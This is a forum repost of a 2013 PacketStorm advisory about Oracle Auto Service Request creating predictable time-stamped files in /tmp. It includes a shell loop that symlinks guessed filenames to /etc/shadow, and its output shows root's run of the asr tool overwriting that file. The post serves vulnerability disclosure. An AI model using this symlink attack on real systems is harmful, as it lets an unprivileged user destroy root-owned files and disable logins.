Praetorian503 Posted February 6, 2013 Report Share Posted February 6, 2013 Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse.Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility.[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; doneroot executes the asr command:[root@oracle-os-lab01 bin]# ./asr register OR register [-e asr-manager-relay-url]: register ASR unregister : unregister ASR show_reg_status : show ASR registration status test_connection : test connection to Oracle... version : show asr script version exit help : display a list of commands ? : display a list of commandsasr> /etc/shadow is now overwritten with the contents of /tmp/status1_020213003722root # cat /etc/shadowid State Bundle68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 7069 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=6870 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=6872 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=7373 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=7267 ACTIVE com.sun.svc.ServiceActivation_4.3.1Source: PacketStorm Quote Link to comment Share on other sites More sharing options...
